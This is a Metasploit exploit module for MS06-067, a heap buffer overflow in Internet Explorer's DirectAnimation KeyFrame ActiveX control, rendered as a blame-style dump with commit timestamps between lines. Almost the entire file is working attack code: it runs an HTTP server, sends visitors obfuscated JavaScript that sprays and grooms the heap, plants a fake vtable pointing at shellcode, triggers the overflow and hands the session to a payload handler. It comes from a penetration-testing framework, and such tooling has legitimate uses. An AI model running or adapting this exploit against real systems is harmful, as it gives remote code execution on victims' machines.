2007-04-03 07:35:54 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2007-04-03 07:35:54 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = NormalRanking
|
2007-04-03 07:35:54 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
#
|
|
|
|
# This module acts as an HTTP server
|
|
|
|
#
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
2007-04-03 07:35:54 +00:00
|
|
|
|
2010-07-16 02:33:25 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
#
|
|
|
|
# Superceded by ms10_018_ie_behaviors, disable for BrowserAutopwn
|
|
|
|
#
|
|
|
|
#include Msf::Exploit::Remote::BrowserAutopwn
|
|
|
|
#autopwn_info({
|
|
|
|
# :ua_name => HttpClients::IE,
|
|
|
|
# :ua_minver => "6.0",
|
|
|
|
# :javascript => true,
|
2014-04-01 15:14:58 +00:00
|
|
|
# :os_name => /^Windows/,
|
2013-08-30 21:28:54 +00:00
|
|
|
# :classid => 'DirectAnimation.PathControl',
|
|
|
|
# :method => 'KeyFrame',
|
|
|
|
# :rank => NormalRanking # reliable memory corruption
|
|
|
|
#})
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
2014-03-29 01:33:40 +00:00
|
|
|
'Name' => 'MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability',
|
2013-08-30 21:28:54 +00:00
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a heap overflow vulnerability in the KeyFrame method of the
|
|
|
|
direct animation ActiveX control. This is a port of the exploit implemented by
|
|
|
|
Alexander Sotirov.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
# Did all the hard work
|
|
|
|
'Alexander Sotirov <asotirov[at]determina.com>',
|
|
|
|
# Integrated into msf
|
|
|
|
'skape',
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2006-4777' ],
|
|
|
|
[ 'OSVDB', '28842' ],
|
|
|
|
[ 'BID', '20047' ],
|
|
|
|
[ 'MSB', 'MS06-067' ],
|
|
|
|
[ 'URL', 'https://www.blackhat.com/presentations/bh-eu-07/Sotirov/Sotirov-Source-Code.zip' ]
|
|
|
|
],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process',
|
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
# Maximum payload size is limited by heaplib
|
|
|
|
'Space' => 870,
|
|
|
|
'MinNops' => 32,
|
|
|
|
'Compat' =>
|
|
|
|
{
|
|
|
|
'ConnectionType' => '-find',
|
|
|
|
},
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Windows 2000/XP/2003 Universal', { }],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Nov 14 2006',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
end
|
2007-04-03 07:35:54 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def on_request_uri(cli, request)
|
|
|
|
return if ((p = regenerate_payload(cli)) == nil)
|
2007-04-03 07:35:54 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Sending #{self.name}")
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# This is taken directly from Alex's exploit -- all credit goes to him.
|
|
|
|
trigger_js = heaplib(
|
|
|
|
"var target = new ActiveXObject('DirectAnimation.PathControl');\n" +
|
|
|
|
"var heap = new heapLib.ie();\n" +
|
|
|
|
"var shellcode = unescape('#{Rex::Text.to_unescape(p.encoded)}');\n" +
|
|
|
|
"var jmpecx = 0x4058b5;\n" +
|
|
|
|
"var vtable = heap.vtable(shellcode, jmpecx);\n" +
|
|
|
|
"var fakeObjPtr = heap.lookasideAddr(vtable);\n" +
|
|
|
|
"var fakeObjChunk = heap.padding((0x200c-4)/2) + heap.addr(fakeObjPtr) + heap.padding(14/2);\n" +
|
|
|
|
"heap.gc();\n" +
|
|
|
|
"for (var i = 0; i < 100; i++)\n" +
|
|
|
|
" heap.alloc(vtable)\n" +
|
|
|
|
"heap.lookaside(vtable);\n" +
|
|
|
|
"for (var i = 0; i < 100; i++)\n" +
|
|
|
|
" heap.alloc(0x2010)\n" +
|
|
|
|
"heap.freeList(fakeObjChunk, 2);\n" +
|
|
|
|
"target.KeyFrame(0x40000801, new Array(1), new Array(1));\n" +
|
|
|
|
"delete heap;\n")
|
2007-04-03 07:35:54 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Obfuscate it up a bit
|
|
|
|
trigger_js = obfuscate_js(trigger_js,
|
|
|
|
'Symbols' =>
|
|
|
|
{
|
|
|
|
'Variables' => [ 'target', 'heap', 'shellcode', 'jmpecx', 'fakeObjPtr', 'fakeObjChunk' ]
|
|
|
|
})
|
2007-04-03 07:35:54 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Fire off the page to the client
|
|
|
|
send_response(cli,
|
|
|
|
"<html><script language='javascript'>#{trigger_js}</script></html>")
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Handle the payload
|
|
|
|
handler(cli)
|
|
|
|
end
|
2007-04-03 07:35:54 +00:00
|
|
|
|
2009-06-07 20:20:42 +00:00
|
|
|
end
|